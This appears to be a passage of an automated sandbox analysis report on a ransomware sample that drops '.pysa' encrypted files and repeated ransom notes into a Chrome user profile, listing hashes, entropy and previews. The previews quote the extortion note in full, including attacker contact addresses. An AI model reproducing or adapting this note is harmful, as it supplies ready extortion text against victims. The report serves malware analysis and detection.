                  Preview: .]R. ..ec...1...tO.w\...P...#.Rr$..s.C._>....U.4..#[{.4.Q:]qo...]...aD.xq/.....h.W9d.......m..,.C<./..=7q..N.):..T.)$.|).x.p..KGC...n.Q...R...%b......2.E..`......pQ.2.Wxk..P.7#.o...b..3E....\E.)..{k.Gi....q..\.8.1.l.w...8.....r|o......U..r.<.*.\.D~}.<.%.A.._.z......[.....o..P...;....}b...a{{.1..F..k.y..T..g..`i.q..K...A....E...>r..s.^t.d...L..T.B..u..d{...?[o.v.a*..#ig.9./R.]%./..c.!...r`...6EeH....L..qak.....L.E.....W..rv/..&....+..{..*..a:,...;....{.....o-....[.(.!.j......4...B`z.=.r...$.:Y*...9....o......J9{....N.....].7zD...Y|.Ha...+.d.<..`.;...w.q\L..,..l.g..%...@`.Lr...O.U..9.......NB2.k...y..N........^..0X.Eg.`aF.!..e......i.ZS...zBv.v..9.{Rt@.w....(!..L*.P.....]{(.$..e...u...`?..@./.....n..d...D.0`>.^MU.L..G .#j.ZG\k....H.]@@....C..T.UIFa.Vk.<......A...75*...].5..N..4L.....%..h......,?.-.V.....g..*....H.......#...O.......yE.7....`.z+......$...D...B..5X.d>...D........._..E...np%.}/.....).Ai.5.J..x"..c..@..8...7Avc..A^....r....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_0.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.669967590529534
                  Encrypted:false
                  SSDEEP:192:L4ntLVle1Adid79Om8ybaAAyZVtF0XpPYlZXvXIYMeq1iIkQi7l81ALZhV:LS9V01Adid7zFbDAyMW/fY87fB7v3
                  MD5:2A61BB6BCB47A77B9FCB095F406E347A
                  SHA1:939CB396C9D2E051DE301FB7CF50F2AE3B746C63
                  SHA-256:4FBFF7E19E83FCA6A7476C00CDD4320C995ED13F4AF96F3AE82BD5DE7EEDA1F5
                  SHA-512:F7F80E794E6EB4F6F5576A9C6236732213B16A17B231D58148FC0161277B89F8B481E823BB422CCFEB2B1947BD4AB2E86D3594DC7837C08E079911DF25BBE3D4
                  Malicious:false
                  Preview: J<B!.q.mV....\F\..p..... .g...#.D.g.R7......h..y%..x^..TJbd...d...T...Ut.'t..;......v.4.-..yI....e..Q..<.P..Dv......|...d..s1.>..H..Q....#J|.R....*.KP...;.0....Eq.T...Gp...(.I.[ .m.I..}..(......4.GRu.......D.88.._S..r._{..<....8....^..W..*I.......'[.V.o.....3....=5.%*.p.`.C/J"&......Kh;.._.........S.....m......L..R6ikd.......BT..h..N.rd..=....E.K.%0y....~.......m~..../....#.i.............._....".}...&8.......-VD..@7..U.G.C.F_.=.sU.>.#........G.i.O.j..2cg.B?-..;...B.O<#[.Y.[b.....R>..P..1t..2....pF.}n..){.:.`{.s.E5........b.WrR..i>..|..%le......S...c.....!....d.e.+.n...V..K.K.Nz..:. ,s.!..}!r.........0....k@.-..8L....j..!..m.bSS.P.".I.jE..IZ8.u...}.O..M......@..U>.8.`}....fI..`.......N..^4....Gsx!....rH.m.F^8e..*...L-...JaEDO....a.yQ......B4KA.[}[....VTi.P..On0..E^Y..G.n.;I.Gm.H..S.=n^..1...SF.vqD..rN..1...&q.-.N..0.N..|.|.N.G.7.xd....|..6.N..Wj.,.(..6..B......f..@.........JbN3.F..d.......,I+....^.z..h...d....n<.[{}...]..r.......1K^3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):206848
                  Entropy (8bit):7.998028706705655
                  Encrypted:true
                  SSDEEP:3072:XPuAZe1Qmdrw5qdhbMsbRKxuBG22zCkS8LkQtA2iwpXjK8avP2mewYv:fuAZe1QCw56KuB+zCk7oQG2DpTtVmevv
                  MD5:01F12C64A5B51A80A8D8929096A81EA2
                  SHA1:7A66B6F8539170A5ADE4C0EE8D617C01F3B921D5
                  SHA-256:57301DAFBC39E8529406C64EE859414F9B9B52C4162A12F7360F888521F769A5
                  SHA-512:107BECD10006266AFA05971EFED8129EC46B1FC5822E9BAEB94442223CFEFD38190ED5C1F01010E7A40158766E3237790AEB5E4902849C2B7AB0E1200FF97D07
                  Malicious:true
                  Preview: -.v......#"b.N?g.ozKw..}....e]..}g&...w...)......U.O....)Ls;.^...-..?=....^-..D...`..............YCn[M..".._....Ghx...$4..M..G.i..O.}3.q?*.|Cs.4.},xF..:\w..$..<.x.V.....T..+.x.$.. .$.C>..cf.E'R.9...6.#.....W.a.....%.{.0....v..W.q.....l....*...^..$.SJ....\BB.Q..P.K3.v.q.o..}..2....L..-p..6.dW.. ..J..&.z..sl..8e..k.T....#....T. .....|.q'..4......c5q..J.3.......W..@7l.>....^.^?.\..._.........[vs.......2H.{......S[..N(c..8YiV.5...&..G..M.~J~...:.....?.....C`....ZOo.:c..NV..!...xA........E.$!s.Z'.{N..."..h[.,.5.V....h.d..#....zO.m{.. ....s.K.?. .P(.:. .[...oJ.....eP.66.$D+4...uX..D....<...V..c$........Fx....1.92G.Gd-..\..G.xY].r..i...Kw..-o.x\^....vk.......B...e..8sA.%CO4q...-..nl...l.w....y,....}G.M..-..X_.U.....kj.B...#.Ls..&.x..6..~/..5....:m.apS..v'.M.y1=..;..[...4......!=.....zJ.J3...-/....p....c.\*..*..@:./..,....ra.ur..|M...b.qMv([.C.{..,R..V..X.4..%......2..z:..'...U-.J.V.fi8>....Q).b.z....q..H....T...G.|>.......9_...Q.....s...X.]b.x.r.
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_2.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.665615466860998
                  Encrypted:false
                  SSDEEP:192:TqHgk82xFDDVa1z9yJFxspoMu1BfNDKAAbGZAeAKBqOCNqcw82q6xJcueeYm:TqH582xFDD0eJ3spoMuTfN2AAbNeaOrv
                  MD5:194C05348C83D62E3332CEA17410F0A8
                  SHA1:BDC5C162FB318A7A225FEF93D229AEEE91306B49
                  SHA-256:8F81DC0E65903B58295ED238DD3361F2964648FC93B311EF0BD1B5F3CFACDF82
                  SHA-512:4CE83374F54D9BB0EAA515637B90FEA462E9D104E4AF5625A528E9A1778CE1F52D5A2155CB9295E82D70E7B831EA9DDBD336A5D22B497A2CE5D2C2A54E384E41
                  Malicious:false
                  Preview: ....47)Lxu..X.....i........^5..O..$..7...A..W.|./.X.&B...~'j..3..._E....L@\u....#.+X...I..8v..........Y...bm!.he.j'............Q1b...b1....J.Ui...N-...... .t..P.qMu.qv.1...:.....O....+.V..L...F.<..p...r......1':................Gs....Cj'.A.A...4.t4O.p..0..C..o._M.h.G]3...3..[.M.zp..).3(....b.....*k.....cn.T.e...8p....Jz..t#..A......J.y....L]..b6.=...&..g.^..SUd..)U.^......Sd.Z........N.}.....`?..1.T.+z.h:[...x.v..1`.^.r.' .~H.a.....-.e.......f.%.).......exj...[.(5...0.(G...7...b...].s...k..hS.*H_.r....@<..v..(.D...G.?(..=..8H...E...O.....|.1......4......t..h..|c.a...O5..;Z..^m.&G............P...,...........c....V{Gl._8..9.;}.=../.....dk.....%.8.8XP.<.i.tQ...W.h..E.6.[....T.SU...R..\./..I..L.|j...=......N}..fS..S.C@.d.#...._.....A.l.BNsX..cS.....0.....8..O..N..O.+o..?.....S,......w'..|..E.=..n.7.!&.0.5.....!.8..<.'=*>L.[..`..un..d.w. .'..y*.&Zhn.Y.J.q.$1Q.`:m..4.6.OL..vj5....c(.Y....>?....ne.#;{kF...~..."s...5.8..(.`
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_3.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.67794562548029
                  Encrypted:false
                  SSDEEP:192:BuJl8VQKG7Sp15E+AelnSjyhKhk8hTStV7vVL+ZVt3TsqDm+dhbIkAL+Flf97B:kl89Gy15NAelSjMgp90VJUI+t9
                  MD5:35074AF50F4CCD76D658596FF1652030
                  SHA1:AEF4555102DE1D810590C60F6507600A75D6B341
                  SHA-256:730AD76B1BD83815F8FDC77C8436655FCBB4C13DEE73960FCC3A3A33BBDD2ED1
                  SHA-512:623AD9192770AF659D44801C5FA5A5BFDECDDA9E6C83CDB4DAC727534CA101A414F36AAC9157CFB1ABF92BF4BE929C8F2BCA14001A8CEE8D9A85020D2485AAFD
                  Malicious:false
                  Preview: z...j.. Uw...e..t...d.._Gi.`..d..X.(..7.......\..+.}6eD.YDf.f...v....`..F+U....'.6-..H).j...5..D.1.m.PRo....9...*.[s.W<q.)<.9..FmQ.A..%.K.9O5...As..=m......'.g..b.p&....k..`]..P..H.A..b..(...?ci..>4.].Z.5...3...j......s...~X...(e._..K.w.e'.uV.....`..j..8...}.........p-.We.....=(..+.5....../.....y.HTy.).y......U......-...v!...#%...u../..:ja.6C...q".xST..0_Kv..8{.nA....Z...;.......*Df..{.@? y.../V.2.B&wai0._^....h..L".8z.....#U..o....K...SL.w....f.S.5..E..`(...ri?A..1.5..5y'....(..3..s.v....ZP......9....<A...}.SIQ<Q...LDp....C..k...#.X.%..HG.{.z..]m.Z.l..0usS.t..5.N....8g.#.KJ...}..h..n.wA..:* ..?....cq..1j.N....-.l%,...Q.k..B.d$]..o"@/p..mOg...\.4.pA....]9....o...#i.x.2../JR.`L.D..V...I...h.R.;.l..H,E..5P.%ZO....y5..f,.....vg.y.=..+=.8....jh....X.|..|.!...yO.*9.|.....@.....:..j^..c....t..w@l..w........?.(+.......d.,....B.R.dF.C...n5.....J.K&dd.J..l.g....=...R.....Z"R]~.N...RK^.....x7.Tc_....DvV...l....>4&'..Ko..4$..W....U......
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\index.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):206848
                  Entropy (8bit):7.998082545694978
                  Encrypted:true
                  SSDEEP:6144:lzKNG6bHPjNxB8ljfz0OpXKnuAoHABGNYoJlI0gEbiA32D:lzKg6DB8Nfz0OfAoh3JlI+biso
                  MD5:29E28B24A780E7A5A36007A518EF8BFF
                  SHA1:F340D676AB81E128A010869FB34A4AAE91294119
                  SHA-256:2041F9E295286E254AC718DC6F2390A18F8AE6D0A27DD417FAC690DEE907F9FB
                  SHA-512:C40C49FD81910258A7B363603F6AC64D89EA9ED5E7BC8BA3F6E35B663C98898CADCC4CB1D43474631B12DA433ABA3E6ECD457AC503BEDD5B97E3814C5CA1FE80
                  Malicious:true
                  Preview: ?.......6..f.W>m..cW...S:..._z...fm...P].g.Pt.1q[.w.H....*.(..c..D.D.0._.P...an..I-......S...E.,1O.f&%..~.i..../.y..$.....M.>...\.b..1......oM......(/.&.*P...j....9p..v.\....d....O...a?.S.d......i..?0..F..G-..$3.>].(.T$.F.A...A.(.gf..%...F.}.A.7......>...L.n..s...ePB.......`..@S.."j.?.../...=}..K.#d....UT.|..e...z....&uMs....).e.[.x....}...5R{..N.jP.(...?..ZQ.K.gm...l.B&.g....U-...f..p...A_y......v-r..l.'....[...w...%.....:z.h...3..-,~K.0../....^..{ y4!...9..!DQ...^R..'.OT=B......5.....)n..a..m...j....oT<w..%P.....(.,0u..\c.5D......aS.....q.b...M..........?A.I.E.%.+.x.....AB......H.;.. ...^.A;-..U...z<.....9+....._...}...u?KV..*.+\.!.k.p.z@..k....<3..S.F....4-F......+ <%X...ra.*&..m...l............ 7C}b.=}.....pR.h.~..0.....>(..v.u....R.mUIs0.....m..Kn.BI.^{...nR@4@0.o.k.D.HD.bk|.wN....v...gqz..S.mb.sp. ...p...t.H..]%...My....r..>^)...<..E..#......V.j.L.go_tV.. ..+.FR~a2...m..>......C...n5.. .%...............@{.!.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.9945312139917535
                  Encrypted:true
                  SSDEEP:1536:fRAtoDHCuk7Zv2EbDbAgnIFd/a6VrFf8GXNLVtv8xjFe5yqhglJsDbdINf6X9:fhCuqp2EnbAgnm/trFf8G9heJqMyDb6g
                  MD5:A2CD0E9A20F1201B526B5AD22083417D
                  SHA1:D1C5B88F06AD1E5A6611B0C8B0C695092B2AFAF3
                  SHA-256:B7C8796E66BC52CA6D1A3CBB23338C0F1A90CC13D9C2405E4B3FB09FC5D782D5
                  SHA-512:9A3E3FDD022CA77F517D5B8767DAE0F9A66105163B59EA8C9B3EEAD946D63240E69C04A1AEE7828B8410BECAF77631402D6931697925BE67C810CBDADBA8C576
                  Malicious:true
                  Preview: ~...&...j[............z.........G...........NAJ....w..6n.1.<A.(.)v.....>{.$..6.'....I...#Ku.a....%..1..C.}.....m+j.....*.6.p.:.o.\....5.6y........JW..W.kF.B}#.......g.:..s...q..^......)..9.^HLki....n<..l%.{..Rt&I. (2Ou...5..-........-....k..A...R..j.I7v...4......Z..&.,Q.......~.!......./...v^ Sp....'.BS..........7.A2.<..r.....99..(.p....0.w7.........>!A#S.d.+.AM..E...J........Uz)...Ia.....}............9.qW.gm%.X.!..F.j.d..Iq.L.K..$...U..K..i%...O../...Z......A.MP...U...b....K%...8..)0.**A1M<..m<.y..%.$.V..%\...d.d..B.........M'.v..q...GvQq..te.).6...+Hq..qx?.!..Rt.....C..x.Sf......Z\@..9..f....:..y..$'.~.6^8.......V.?.... .N%.d).5....$..........ip..0...;j_H?..0K..S.}.!.*.Z....Y..@.coJJL...N.X.pZ......mE.t..p...n....T.W8r..._...u...mV.H.H.N."'...BOU......"..v.a.`...>..89..J.y...=...r.2r...a...N4ok.th.P...e..k.E.+mN. .5.....rpPv.KVN6.,.......p.L..$.=...F....K......aJ..e./A.F.d...bP..j.p.?p......Km.=..AZ;(.:.%.i..N.......a.
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994078523915232
                  Encrypted:true
                  SSDEEP:1536:VeVLroPn2xwjB1IcRpjO9DL0Ijd2gliKfOzDOGUqRmtZmtI6wFimg:Vq8uUBucXjM4LDKF7qTMG
                  MD5:CC08A8590079AB503BEF3C5B6AF45D3E
                  SHA1:42E64F28889621FDFB570905D28A63437ABAD853
                  SHA-256:D03F20D84A4162D4756158F6D8A7B3F5D34C60D66D62589068B2A3DF5A2FB83F
                  SHA-512:B4BAD684F77768744EA09EF90FD9D9438854DC43403EB1F4461E9D57DED503FBD5ECB42E053F4B172164CC9120CECAB7A143AA0548CF330EE526731B36CB8528
                  Malicious:true
                  Preview: R..#D@|G.d.........6`.2......'v....8d..iqBA.5.kgD)....{..e.r......T5-2W.i.-../........7...~...#...s}.>Z.t.0......D.(6..Z.1ymHV..|=.Jzt.....,V..5..1y^x=1.p.4..VX..#..&...z...k....}....../....NO.|@......0r[t.......f..~.....U.O..M....O.-LD<.N8.#.jy....^|.r.K.\.H...07^.(%.?......(l....59.p..?7.}K!d.u~3..R..w....O.1W..%......Y....,9...]s..o/...9.lFQC...x.nB..E.f..F.....q...G......^V.)..Q.C4.+.y...i...Y...`.'..[....F..k..sk6....T.......0q.......LS.*-m6b.l'....O).|.h...YN~nR.y~.Tt...e..*.4.;.0..7..t.=.....>...y.......b..O........_....R.i..JO.d.T7..$..0O....{...]u=|.......c..3....b.E*`...;..5.&.;RF0.._....'...v`.3u....)..Z._..>Q60..A..P.b.4...[...............i$f.y..Lk6.gj.<,..(...{.a.......Q(c..b....~..9..0.. ...m.t....9..e.J.G.v.$._.XUS........|.%.]!]Ai.H\...q!..#.q........$7a..z.8.V.s...l5.6X@"...).X.....E/W...CW.L.h.....<.@.....).0..D..gs...b.VF......r@..hk...T.v_..^V..9....0...8.&.`.a.6.}V.3c...M.Oj,...N/t..v..S...a.+..=.P,.Y}#....zzu
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Last Session.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.147297225220778
                  Encrypted:false
                  SSDEEP:96:0zJwA8S6qBgnK2jmRv4gKsGqFcZlR6ixbkz4LHHd88DHzuAE4QnQWN:CBWHjEIZpZCEI4LHHysTuAXQN
                  MD5:3ABF5FD1BDCB2FDC777DC6547B064B98
                  SHA1:E51E2DDDA2E1A028242FD35306CDC4A37C688594
                  SHA-256:0DC26A3CE66882A85696C20441A95585BFA81CFC49463CA2AD6DB3FD748DA119
                  SHA-512:6F0873F600331822D5FA0383003BD933D9771654561AB9C3AABA1B9BC242E00D2B28BFF066B1C9F9DE857DD68452DF92A8AF1A0828F613FB439C1E6E1ACFD1D3
                  Malicious:false
                  Preview: #Z.r...$J........g.......6s...)._uo.V.........z5Ud.d...&.I....9.....|....V...;....o.........:MX.zZ.jq..>.;>.T..+..H.8.uw2.>a......H.F|......{G./.$4.5...$...._9.v..7.RrCJW/y.WX.n...hl.......0..xzvR...t...O...J....:+...O...t2..NQ..v..Q.=...k..g......W.....2.w1r$.+.^L.oE.e...."P@.5..L..............7S..Z.|.7VIN..'.5\.PY.+.v...8v.......D..D..|.;... X+..F>.%.|a.@.....A<..9'g.B..lQ.A7.a...5"QO\.9.BG..Uh6.1.....oQ.Q..0.M....Yu.@..V..0...!>.}..*.V...s.|.s[..D.....x.?<.x....l...tk./n....U4.=z.....Dq.}...Ga.....0'1u......e;.QHL.5.Z2. .$...F.~v'.`.r..L.Rk. .m.ze .c..;.......R<.:.w....R ...k..5.0...DiGu..WG...}..S%.c.....t.........n..."V....S...H..5.b..FiL.5.+_+MB..I ...._..l;.Z....j|.9O;$.z...|...p/...Xv..E#.;....G...C..;.......J..Z.F.G..-...m.F..9]..spnB...Qy.>...../Mj......:F.y...'']".w.9t..(|.._...$.46........} &...V..e.'h7..Ri.=......K...v...=.......$.U.z$.U..z..N..}...S..cU.N.....)2.O.....;\......$..........T8.}.k.......,.y....@..yH..hh&..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
